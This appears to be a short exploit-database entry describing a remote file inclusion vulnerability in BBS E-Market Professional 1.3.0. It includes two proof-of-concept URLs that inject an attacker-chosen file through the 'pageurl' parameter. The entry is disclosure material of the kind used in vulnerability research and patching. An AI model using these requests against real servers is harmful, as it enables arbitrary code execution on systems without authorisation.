[] NeoSense

BBS E-Market Professional bf_130 (1.3.0) - Remote File Inclusion

Author: Ahmad Muammar
type: webapps
platform: php
port: 
date_added: 2004-09-09 
date_updated: 2013-03-05 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/11146/info

BBS E-Market Professional is reported to be affected by a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system.

http://www.example.com/becommunity/community/index.php?pageurl=[injection URL]
http://www.example.com/becommunity/community/index.php?from_market=Y&pageurl=[injection URL]